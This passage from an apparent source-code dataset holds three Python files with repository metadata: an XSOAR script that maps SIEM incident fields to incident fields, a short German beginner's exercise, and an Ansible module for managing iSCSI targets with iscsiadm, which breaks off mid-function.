['validate_number']},\n\n 'Email BCC': {'aliases': ['emailbcc', 'email bcc', 'bcc recipient', 'bcc'],\n 'validators': ['validate_email']},\n\n 'Email Body': {'aliases': ['emailbody', 'email body', 
'body'],\n 'validators': []},\n 'Email Body Format': {'aliases': ['emailbodyformat',\n 'email body format',\n 'body type',\n 'body content type'],\n 'validators': []},\n 'Email Body HTML': {'aliases': ['emailbodyhtml', 'email body html'],\n 'validators': []},\n\n 'Email CC': {'aliases': ['emailcc', 'email cc', 'cc recipient', 'cc'],\n 'validators': ['validate_email']},\n\n 'Email From': {'aliases': ['emailfrom', 'email from', 'from'],\n 'validators': ['validate_email']},\n\n 'Email HTML': {'aliases': ['emailhtml', 'email html'], 'validators': []},\n\n 'Email Headers': {'aliases': ['emailheaders', 'email headers', 'headers', 'message headers',\n 'internet message header'],\n 'validators': ['']},\n\n 'Email In Reply To': {'aliases': ['emailinreplyto', 'email in reply to'],\n 'validators': []},\n\n 'Email Received': {'aliases': ['emailreceived',\n 'email received',\n 'received date time',\n 'received time'],\n 'validators': ['validate_date']},\n\n 'Email Reply To': {'aliases': ['emailreplyto', 'email replay to', 'reply to'],\n 'validators': []},\n\n 'Email Sender IP': {'aliases': ['emailsenderip', 'email sender ip'],\n 'validators': ['validate_ip']},\n\n 'Email Size': {'aliases': ['emailsize', 'email size'], 'validators': ['validate_number']},\n\n 'Email Subject': {'aliases': ['emailsubject', 'email subject', 'subject'],\n 'validators': []},\n\n 'Email To': {'aliases': ['emailto',\n 'email to',\n 'to recipients',\n 'recipients',\n 'recipient'],\n 'validators': ['validate_email']},\n\n 'File Hash': {'aliases': ['filehash', 'file hash', 'event file hash', 'md5', 'sha1', 'sha256'],\n 'validators': ['validate_hash']},\n 'File Name': {'aliases': ['filename', 'file name'], 'validators': []},\n 'File Path': {'aliases': ['filepath', 'file path', 'full path', 'full path'],\n 'validators': ['validate_file_full_path']},\n 'File Size': {'aliases': ['filesize', 'file size'], 'validators': ['validate_number']},\n\n 'File Type': {'aliases': ['filetype', 'file type'],\n 'validators': 
['validate_alphanumeric_with_common_punct']},\n\n 'Source Hostname': {\n 'aliases': ['source hostname', 'source host name', 'src hostname', 'src host name'],\n 'validators': ['validate_hostname']},\n\n 'Destination Hostname': {\n 'aliases': ['destination hostname', 'destination host name',\n 'dest hostname', 'dest host name', 'dst hostname', 'dst host name',\n 'target hostname', 'target host name'],\n 'validators': ['validate_hostname']},\n\n 'Source Network': {'aliases': ['source network', 'sourcenetwork', 'src network'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'Destination Network': {'aliases': ['destination network', 'destinationnetwork',\n 'dest network', 'dst network', 'target netwrok'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Device Name': {\n 'aliases': ['devicename', 'device name', 'endpoint name', 'end point name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'MAC Address': {'aliases': ['macaddress', 'mac address', 'mac', 'src mac', 'source mac'],\n 'validators': ['validate_mac']},\n\n 'PID': {'aliases': ['pid', 'process pid', 'parent process pid', 'target process pid'],\n 'validators': ['validate_number']},\n 'Parent Process ID': {'aliases': ['parentprocessid', 'parent process id'],\n 'validators': ['validate_number']},\n\n 'Region': {'aliases': ['region', 'region'], 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Signature': {'aliases': ['signature', 'signature'], 'validators': []},\n\n 'Source IP': {\n 'aliases': ['sourceip', 'source ip', 'src ip', 'src address', 'source address', 'computer ip',\n 'device ip',\n 'attacker address', 'attacker ip', 'sender ip', 'sender address', 'agent ip'],\n 'validators': ['validate_ip']},\n\n 'Source Port': {'aliases': ['sourceport',\n 'source port',\n 'src port'],\n 'validators': ['validate_number']},\n\n 'OS': {'aliases': ['operating system', 'os type', 'os version', 'os'],\n 'validators': []},\n\n 'Subtype': {'aliases': 
['subtype', 'subtype'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Terminated Action': {'aliases': ['terminatedaction', 'terminated action'],\n 'validators': []},\n\n 'Traps ID': {'aliases': ['trapsid', 'traps id', 'trap id'], 'validators': []},\n\n 'Source Username': {'aliases': ['username', 'username', 'user name', 'src user name',\n 'src username', 'source username', 'source user name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'Destination Username': {'aliases': ['destination username', 'destination user name',\n 'dest username', 'dest user name', 'dst username', 'dst user name',\n 'target user name', 'target username'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Detection URL': {'aliases': ['detection url'],\n 'validators': ['validate_url']},\n\n 'Vendor ID': {'aliases': ['vendorid', 'vendor id'], 'validators': []},\n 'Vendor Product': {'aliases': ['vendorproduct', 'vendor product'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'category': {'aliases': ['category', 'category'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'details': {'aliases': ['details', 'description'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'name': {'aliases': ['name', 'Name', 'alert name', 'event name', 'rule name', 'title'],\n 'validators': ['validate_alphanumeric_with_common_punct', 'extact_name_math']},\n 'occurred': {'aliases': ['occurred', 'occured', 'occurred time', 'event start time', 'event at',\n 'event time', 'start time',\n 'create time', 'timestamp', 'unix time', 'click time'],\n 'validators': ['validate_date']},\n\n 'owner': {'aliases': ['owner'], 'validators': []},\n\n 'severity': {'aliases': ['event severity', 'severity', 'event priority', 'priority', 'urgency'],\n 'validators': []},\n\n 'Log Source': {'aliases': ['log source', 'log sources', 'logsource'], 'validators': []},\n\n 'Protocol': {'aliases': ['protocol'], 'validators': []},\n\n 
}\n\nsuffix_mapping = {\n 'ing': '',\n 'ly': '',\n 'ed': '',\n 'ious': '',\n 'ies': 'y',\n 'ive': '',\n 'es': '',\n 's': ''\n}\n\n\nclass DateValidator:\n\n def __init__(self):\n year_options = ['%y', '%Y']\n months_options = ['%m', '%B']\n day_options = ['%d']\n delimeters_options = [\".\", \"-\", \"/\", \"\\\\\"]\n self.common_separators = [' ', 'T', ',']\n\n date_formats_options = [] # type: List[tuple]\n for delimeter in delimeters_options:\n delimeters = [delimeter]\n date_formats_options += list(\n itertools.product(year_options, delimeters, months_options, delimeters, day_options))\n date_formats_options += list(\n itertools.product(year_options, delimeters, day_options, delimeters, months_options))\n date_formats_options += list(\n itertools.product(day_options, delimeters, months_options, delimeters, year_options))\n date_formats_options += list(\n itertools.product(day_options, delimeters, months_options, delimeters, year_options))\n\n self.date_formats_options = map(lambda x: \"\".join(x), date_formats_options)\n\n def try_parsing_date(self, text):\n for fmt in self.date_formats_options:\n try:\n return datetime.strptime(text, fmt)\n except ValueError:\n pass\n return None\n\n def has_valid_date(self, text):\n parts = [] # type: List[str]\n for sep in self.common_separators:\n parts += text.split(sep)\n return any(map(lambda x: self.try_parsing_date(x) is not None, parts))\n\n @staticmethod\n def is_datetime_last_years(d, number_of_years=3):\n if d is not None:\n now = datetime.now()\n return now - timedelta(days=365 * number_of_years) <= d <= now + timedelta(days=365 * number_of_years)\n return False\n\n @staticmethod\n def safe_parse_timestamp(value):\n try:\n d = datetime.fromtimestamp(int(value))\n return d\n except Exception:\n return None\n\n def is_unix_timestamp(self, value):\n try:\n value = int(value)\n return self.is_datetime_last_years(self.safe_parse_timestamp(value)) or self.is_datetime_last_years(\n self.safe_parse_timestamp(value / 
1000))\n except Exception:\n return False\n\n\nclass Validator:\n\n def __init__(self):\n self.EMAIL_REGEX = re.compile('^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$')\n self.NUMBER_REGEX = re.compile('^([0-9]+)$')\n self.SHA256_REGEX = re.compile('^[A-Fa-f0-9]{64}$')\n self.MD5_REGEX = re.compile('^[a-fA-F0-9]{32}$')\n self.HASH_REGEX = re.compile('^[a-fA-F0-9]+$')\n self.MAC_REGEX = re.compile('^[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\\\1[0-9a-f]{2}){4}$', re.IGNORECASE)\n self.URL_REGEX = re.compile(\n r'^(?:http|ftp|hxxp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\n r'localhost|' # localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n self.COMMON_NAME_CHARECTERS = re.compile('^[0-9a-zA-Z\"\\s_\\-\\'./]+$')\n self.HOSTNAME_PART_REGEX = re.compile('(?!-)[A-Z\\d-]{1,63}(? 255: # type: ignore\n return False\n if hostname[-1] == \".\": # type: ignore\n hostname = hostname[:-1] # type: ignore\n allowed = re.compile(\"(?!-)[A-Z\\d-]{1,63}(? 
len(lst):\n sub_set = False\n else:\n for i in range(len(lst)):\n if lst[i] == s[0]:\n n = 1\n while (n < len(s)) and (i + n) < len(lst) and (lst[i + n] == s[n]):\n n += 1\n\n if n == len(s):\n sub_set = True\n\n return sub_set\n\n\ndef lemma_word(word):\n for suffix in suffix_mapping:\n if word.endswith(suffix):\n candidate = word[:-len(suffix)] + suffix_mapping[suffix]\n if candidate in ALL_POSSIBLE_TERMS_SET or candidate.lower() in ALL_POSSIBLE_TERMS_SET:\n return candidate.lower()\n return word.lower()\n\n\ndef remove_dups(seq):\n return list(OrderedDict.fromkeys(seq))\n\n\ndef split_by_non_alpha_numeric(_string):\n return filter(lambda x: x, re.split('[^a-zA-Z0-9]', _string))\n\n\ndef camel_case_split(identifier):\n matches = re.finditer('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', identifier)\n return [m.group(0) for m in matches]\n\n\ndef flatten_json(y):\n out = {}\n has_more_than_one_value = []\n delimeter = '.'\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + delimeter)\n elif type(x) is list and len(x) > 0 and type(x) is not dict:\n i = 0\n for a in x:\n flatten(a, name + \"[\" + str(i) + \"]\" + delimeter)\n i += 1\n if i > 1:\n has_more_than_one_value.append(name[:-1])\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out, has_more_than_one_value\n\n\ndef number_of_terms(value):\n return len(value.split(\" \"))\n\n\ndef normilize(value):\n parts = [] # type: List[str]\n for part in split_by_non_alpha_numeric(value):\n parts += camel_case_split(part)\n terms = map(lemma_word, parts)\n return remove_dups(terms)\n\n\ndef validate_value_with_validator(alias, value, json_field_name=None):\n field_name = ALIASING_MAP[alias]\n validators = SIEM_FIELDS[field_name]['validators'] # type: ignore\n validators = [v for v in validators if v]\n if len(validators) == 0:\n return True\n validator_results = []\n for validator_name in validators:\n validator_results.append(VALIDATOR.validate(validator_name, alias, 
value, json_field_name))\n return all(validator_results)\n\n\ndef get_candidates(json_field_name):\n json_field_terms = normilize(json_field_name)\n aliases_terms = ALIASING_TERMS_MAP.items()\n match_terms = map(lambda x: x[0],\n filter(lambda alias_terms: is_sublist_of_list(alias_terms[1], json_field_terms), aliases_terms))\n return sorted(match_terms, reverse=True, key=number_of_terms)\n\n\ndef suggest_field_with_alias(json_field_name, json_field_value=None):\n norm_json_field_name = \" \".join(normilize(json_field_name))\n candidates = get_candidates(json_field_name)\n if json_field_value is not None:\n candidates = filter(lambda c: validate_value_with_validator(c, json_field_value, norm_json_field_name),\n candidates)\n if len(candidates) > 0:\n alias = candidates[0]\n return ALIASING_MAP[alias], alias\n return None, None\n\n\ndef suggest_field(json_field_name, json_field_value=None):\n return suggest_field_with_alias(json_field_name, json_field_value)[0]\n\n\ndef generate_aliases(field):\n aliases = []\n aliases.append(field.lower())\n aliases.append(\" \".join(normilize(field)))\n aliases.append(\"\".join(normilize(field)))\n return aliases\n\n\ndef get_aliasing(siem_fields):\n aliasing_map = {}\n aliases_terms_map = {}\n for field, data in siem_fields.items():\n for alias in data['aliases']:\n aliasing_map[alias] = field\n aliases_terms_map[alias] = alias.split(\" \")\n return aliasing_map, aliases_terms_map\n\n\ndef is_value_substring_of_one_values(value, all_values):\n return any(map(lambda field: value in field, all_values))\n\n\ndef get_alias_index(field_name, alias):\n return SIEM_FIELDS[field_name]['aliases'].index(alias) # type: ignore\n\n\ndef get_most_relevant_json_field(field_name, json_field_to_alias):\n if len(json_field_to_alias) == 0:\n return\n\n # calculate jaccard score for each alias, and get the candidates with max score\n scores = {}\n for json_field, alias in json_field_to_alias.items():\n scores[json_field] = 
jaccard_similarity_for_string_terms(json_field, alias)\n scores = {k: v for k, v in scores.items() if v == max(scores.values())}\n\n # calculate jaccard score for each field, and get the candidates with max score\n for json_field, alias in json_field_to_alias.items():\n scores[json_field] = jaccard_similarity_for_string_terms(json_field, field_name)\n scores = {k: v for k, v in scores.items() if v == max(scores.values())}\n\n # for candidates with the same score with the least alias index\n candidates = sorted(list(scores.keys()),\n key=lambda json_field: get_alias_index(field_name, json_field_to_alias[json_field]))\n\n return candidates[0]\n\n\ndef match_for_incident(incident_to_match):\n flat_incident, more_than_one_field_items = flatten_json(incident_to_match)\n incident = {k: v for k, v in flat_incident.items()\n if not is_value_substring_of_one_values(k, more_than_one_field_items)}\n if SCHEME_ONLY:\n incident = {k: v for k, v in incident.items() if not k.endswith(COUNT_KEYWORD)}\n else:\n incident = {k: v for k, v in incident.items() if v is not None and VALIDATOR.validate_not_count(k, v)}\n\n mapping = {} # type: ignore\n for json_field_name, json_field_value in incident.items():\n # we try to get suggestion if it's scheme or if the value is not empty\n if SCHEME_ONLY or json_field_value:\n incident_field_suggestion, alias = suggest_field_with_alias(json_field_name, json_field_value)\n if incident_field_suggestion:\n if incident_field_suggestion not in mapping:\n mapping[incident_field_suggestion] = {}\n mapping[incident_field_suggestion][json_field_name] = alias\n return {incident_field_name: get_most_relevant_json_field(incident_field_name, json_field_to_alias) for\n incident_field_name, json_field_to_alias in mapping.items()}\n\n\ndef jaccard_similarity(list1, list2):\n intersection = len(list(set(list1).intersection(list2)))\n union = (len(list1) + len(list2)) - intersection\n return float(intersection) / union\n\n\ndef 
jaccard_similarity_for_string_terms(str1, str2):\n return jaccard_similarity(normilize(str1), normilize(str2))\n\n\ndef get_most_relevant_match_for_field(field_name, cnt):\n # return exact match\n if field_name in cnt:\n return field_name\n\n suggestions_with_jaccard_score = [(suggestion, jaccard_similarity_for_string_terms(field_name, suggestion)) for\n suggestion in cnt.keys()]\n suggestions_with_jaccard_score = sorted(suggestions_with_jaccard_score, key=lambda x: x[1], reverse=True)\n\n # check for extact terms\n if suggestions_with_jaccard_score[0][1] == 1:\n return suggestions_with_jaccard_score[0][0]\n\n # if we have only scheme or all the values are the same\n if SCHEME_ONLY or len(set(cnt.values())) == 1:\n return suggestions_with_jaccard_score[0][0]\n\n return cnt.most_common()[0][0]\n\n\ndef match_for_incidents(incidents_to_match):\n fields_cnt = {} # type: Dict[str, Counter]\n for flat_incident in incidents_to_match:\n for k, v in match_for_incident(flat_incident).items():\n if k not in fields_cnt:\n fields_cnt[k] = Counter()\n if v:\n fields_cnt[k][v] += 1\n mapping_result = {field_name: get_most_relevant_match_for_field(field_name, field_cnt) for field_name, field_cnt in\n fields_cnt.items()}\n return mapping_result\n\n\ndef format_value_to_mapper(json_field):\n parts = json_field.split('.', 1)\n root = parts[0]\n accessor = \"\"\n if len(parts) > 1:\n accessor = parts[1]\n res = {\n \"simple\": \"\",\n \"complex\": {\n \"root\": root,\n \"accessor\": accessor,\n \"filters\": [],\n \"transformers\": []\n }\n }\n return res\n\n\ndef format_incident_field_to_mapper(incident_field_name, field_name_to_machine_name):\n res = {\n \"simple\": \"\",\n \"complex\": {\n \"root\": field_name_to_machine_name[incident_field_name],\n \"accessor\": \"\",\n \"filters\": [],\n \"transformers\": []\n }\n }\n return res\n\n\ndef verify_non_empty_values_in_incidents(expression, incidents):\n for incident in incidents:\n res = demisto.dt(incident, expression)\n if res:\n 
return True\n return False\n\n\ndef get_complex_value_key(complex_value):\n if 'complex' in complex_value:\n complex_value = complex_value['complex']\n readable_value = complex_value.get('root')\n if complex_value.get('accessor'):\n readable_value += \".\" + complex_value.get('accessor')\n return readable_value\n\n\ndef combine_mappers(original_mapper, new_mapper, incidents):\n mapper = new_mapper\n if original_mapper:\n mapper.update(original_mapper)\n return mapper\n\n\ndef filter_by_dict_by_keys(_dict, keys):\n return {k: v for k, v in _dict.items() if k in keys}\n\n\ndef parse_incident_sample(sample):\n if type(sample) is dict and 'rawJSON' in sample:\n incident = json.loads(sample['rawJSON'])\n else:\n try:\n incident = json.loads(sample)\n except Exception:\n incident = sample\n return incident\n\n\nSCHEME_ONLY = False\nVALIDATOR = Validator()\nALIASING_MAP, ALIASING_TERMS_MAP, FIELD_NAME_TO_CLI_NAME = {}, {}, {}\nALL_POSSIBLE_TERMS_SET = set()\n\n\ndef init():\n global SCHEME_ONLY, VALIDATOR, \\\n ALIASING_MAP, ALIASING_TERMS_MAP, \\\n ALL_POSSIBLE_TERMS_SET, SIEM_FIELDS, FIELD_NAME_TO_CLI_NAME\n\n SCHEME_ONLY = demisto.args().get('incidentSamplesType') in [SAMPLES_OUTGOING, SAMPLES_SCHEME]\n\n fields = demisto.args().get('incidentFields', {})\n if fields and len(fields) > 0:\n fields_names = map(lambda x: x['name'], fields)\n SIEM_FIELDS = filter_by_dict_by_keys(SIEM_FIELDS, fields_names)\n for custom_field in filter(lambda x: not x['system'], fields):\n field_name = custom_field[INCIDENT_FIELD_NAME]\n SIEM_FIELDS[field_name] = {'aliases': generate_aliases(field_name), 'validators': []}\n\n FIELD_NAME_TO_CLI_NAME = {field[INCIDENT_FIELD_NAME]: field[INCIDENT_FIELD_MACHINE_NAME] for field in fields}\n\n ALIASING_MAP, ALIASING_TERMS_MAP = get_aliasing(SIEM_FIELDS)\n\n terms = [] # type: List[str]\n for field in SIEM_FIELDS.values():\n for alias in field['aliases']: # type: ignore\n terms += alias.split(\" \")\n ALL_POSSIBLE_TERMS_SET = set(terms)\n\n\ndef 
main():\n init()\n incidents_samples = demisto.args().get('incidentSamples')\n if incidents_samples:\n if isinstance(incidents_samples, basestring):\n incidents_samples = json.loads(incidents_samples) # type: ignore\n incidents = map(parse_incident_sample, incidents_samples)\n else:\n return_error(\"Could not parse incident samples\")\n\n original_mapper = demisto.args().get('currentMapper')\n if type(original_mapper) is not dict or len(original_mapper) == 0:\n original_mapper = None\n\n matches = match_for_incidents(incidents)\n if demisto.args().get('incidentSamplesType') == SAMPLES_OUTGOING:\n mapper = {v: format_incident_field_to_mapper(k, FIELD_NAME_TO_CLI_NAME) for k, v in matches.items() if\n k in FIELD_NAME_TO_CLI_NAME}\n else:\n mapper = {k: format_value_to_mapper(v) for k, v in matches.items()}\n mapper = combine_mappers(original_mapper, mapper, incidents)\n\n return mapper\n\n\nif __name__ in ['__main__', '__builtin__', 'builtins']:\n demisto.results(main())\n"},"avg_line_length":{"kind":"number","value":41.982712766,"string":"41.982713"},"max_line_length":{"kind":"number","value":119,"string":"119"},"alphanum_fraction":{"kind":"number","value":0.565423965,"string":"0.565424"}}},{"rowIdx":46364,"cells":{"hexsha":{"kind":"string","value":"beb9462e7eb4cb9120161d5efcebb2195448e61e"},"size":{"kind":"number","value":388,"string":"388"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"vorl1.py"},"max_stars_repo_name":{"kind":"string","value":"haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python"},"max_stars_repo_head_hexsha":{"kind":"string","value":"bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"vorl1.py"},"max_issues_repo_name":{"kind":"string","value":"haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python"},"max_issues_repo_head_hexsha":{"kind":"string","value":"bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"vorl1.py"},"max_forks_repo_name":{"kind":"string","value":"haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python"},"max_forks_repo_head_hexsha":{"kind":"string","value":"bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"# 1. Vorlesung mit Python (3. zu Skriptsprachen insges. -- 26.09.2020 - 1. PDF dazu)\n\nx = input (\"Ihr Name? \")\nX = \"Hallo \" + x\nprint (x)\n\nx = input (\"Ihr Alter? 
\")\nx = int(x) - 5 \nprint (x)\n\n# Seite 12\n\nliste = \"Hello World\"\nprint (liste)\nprint (liste[2])\n\n# Seite 17\n\nstrvar = \"ABC\"\nprint (strvar)\n\nstrvar = \"ABC\" * 5\nprint (strvar)\n\n#strvar = \"ABC\" + 5 #datentypfehler\nprint (strvar)\n\n"},"avg_line_length":{"kind":"number","value":13.8571428571,"string":"13.857143"},"max_line_length":{"kind":"number","value":84,"string":"84"},"alphanum_fraction":{"kind":"number","value":0.6082474227,"string":"0.608247"}}},{"rowIdx":46365,"cells":{"hexsha":{"kind":"string","value":"22a835b39d5c26d87758f88e10e54d6007c99983"},"size":{"kind":"number","value":11393,"string":"11,393"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py"},"max_stars_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py"},"max_issues_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py"},"max_forks_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2013, Serge van Ginderachter \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\nDOCUMENTATION = r'''\n---\nmodule: open_iscsi\nauthor:\n- Serge van Ginderachter (@srvg)\nshort_description: Manage iSCSI targets with Open-iSCSI\ndescription:\n - Discover targets on given portal, (dis)connect targets, mark targets to\n manually or auto start, return device nodes of connected targets.\nrequirements:\n - open_iscsi library and tools (iscsiadm)\noptions:\n portal:\n description:\n - The IP address of the iSCSI target.\n type: str\n aliases: [ ip ]\n port:\n description:\n - The port on which the iSCSI target process listens.\n type: str\n default: 3260\n target:\n description:\n - The iSCSI target name.\n type: str\n aliases: [ name, targetname ]\n login:\n description:\n - Whether the target node should be connected.\n type: bool\n aliases: [ state ]\n node_auth:\n description:\n - The 
value for C(discovery.sendtargets.auth.authmethod).\n type: str\n default: CHAP\n node_user:\n description:\n - The value for C(discovery.sendtargets.auth.username).\n type: str\n node_pass:\n description:\n - The value for C(discovery.sendtargets.auth.password).\n type: str\n auto_node_startup:\n description:\n - Whether the target node should be automatically connected at startup.\n type: bool\n aliases: [ automatic ]\n discover:\n description:\n - Whether the list of target nodes on the portal should be\n (re)discovered and added to the persistent iSCSI database.\n - Keep in mind that C(iscsiadm) discovery resets configuration, like C(node.startup)\n to manual, hence combined with C(auto_node_startup=yes) will always return\n a changed state.\n type: bool\n show_nodes:\n description:\n - Whether the list of nodes in the persistent iSCSI database should be returned by the module.\n type: bool\n'''\n\nEXAMPLES = r'''\n- name: Perform a discovery on 10.1.2.3 and show available target nodes\n open_iscsi:\n show_nodes: yes\n discover: yes\n portal: 10.1.2.3\n\n# NOTE: Only works if exactly one target is exported to the initiator\n- name: Discover targets on portal and login to the one available\n open_iscsi:\n portal: '{{ iscsi_target }}'\n login: yes\n discover: yes\n\n- name: Connect to the named target, after updating the local persistent database (cache)\n open_iscsi:\n login: yes\n target: iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d\n\n- name: Disconnect from the cached named target\n open_iscsi:\n login: no\n target: iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d\n'''\n\nimport glob\nimport os\nimport time\n\nfrom ansible.module_utils.basic import AnsibleModule\n\nISCSIADM = 'iscsiadm'\n\n\ndef compare_nodelists(l1, l2):\n l1.sort()\n l2.sort()\n return l1 == l2\n\n\ndef iscsi_get_cached_nodes(module, portal=None):\n cmd = '%s --mode node' % iscsiadm_cmd\n (rc, out, err) = module.run_command(cmd)\n\n if rc == 0:\n lines = 
out.splitlines()\n nodes = []\n for line in lines:\n # line format is \"ip:port,target_portal_group_tag targetname\"\n parts = line.split()\n if len(parts) > 2:\n module.fail_json(msg='error parsing output', cmd=cmd)\n target = parts[1]\n parts = parts[0].split(':')\n target_portal = parts[0]\n\n if portal is None or portal == target_portal:\n nodes.append(target)\n\n # older versions of scsiadm don't have nice return codes\n # for newer versions see iscsiadm(8); also usr/iscsiadm.c for details\n # err can contain [N|n]o records...\n elif rc == 21 or (rc == 255 and \"o records found\" in err):\n nodes = []\n else:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n return nodes\n\n\ndef iscsi_discover(module, portal, port):\n cmd = '%s --mode discovery --type sendtargets --portal %s:%s' % (iscsiadm_cmd, portal, port)\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_loggedon(module, target):\n cmd = '%s --mode session' % iscsiadm_cmd\n (rc, out, err) = module.run_command(cmd)\n\n if rc == 0:\n return target in out\n elif rc == 21:\n return False\n else:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_login(module, target, portal=None, port=None):\n node_auth = module.params['node_auth']\n node_user = module.params['node_user']\n node_pass = module.params['node_pass']\n\n if node_user:\n params = [('node.session.auth.authmethod', node_auth),\n ('node.session.auth.username', node_user),\n ('node.session.auth.password', node_pass)]\n for (name, value) in params:\n cmd = '%s --mode node --targetname %s --op=update --name %s --value %s' % (iscsiadm_cmd, target, name, value)\n (rc, out, err) = module.run_command(cmd)\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n cmd = '%s --mode node --targetname %s --login' % (iscsiadm_cmd, target)\n if portal is not None and port is not None:\n cmd += ' --portal %s:%s' % (portal, port)\n\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n 
module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_logout(module, target):\n cmd = '%s --mode node --targetname %s --logout' % (iscsiadm_cmd, target)\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_device_node(module, target):\n # if anyone know a better way to find out which devicenodes get created for\n # a given target...\n\n devices = glob.glob('/dev/disk/by-path/*%s*' % target)\n devdisks = []\n for dev in devices:\n # exclude partitions\n if \"-part\" not in dev:\n devdisk = os.path.realpath(dev)\n # only add once (multi-path?)\n if devdisk not in devdisks:\n devdisks.append(devdisk)\n return devdisks\n\n\ndef target_isauto(module, target):\n cmd = '%s --mode node --targetname %s' % (iscsiadm_cmd, target)\n (rc, out, err) = module.run_command(cmd)\n\n if rc == 0:\n lines = out.splitlines()\n for line in lines:\n if 'node.startup' in line:\n return 'automatic' in line\n return False\n else:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_setauto(module, target):\n cmd = '%s --mode node --targetname %s --op=update --name node.startup --value automatic' % (iscsiadm_cmd, target)\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_setmanual(module, target):\n 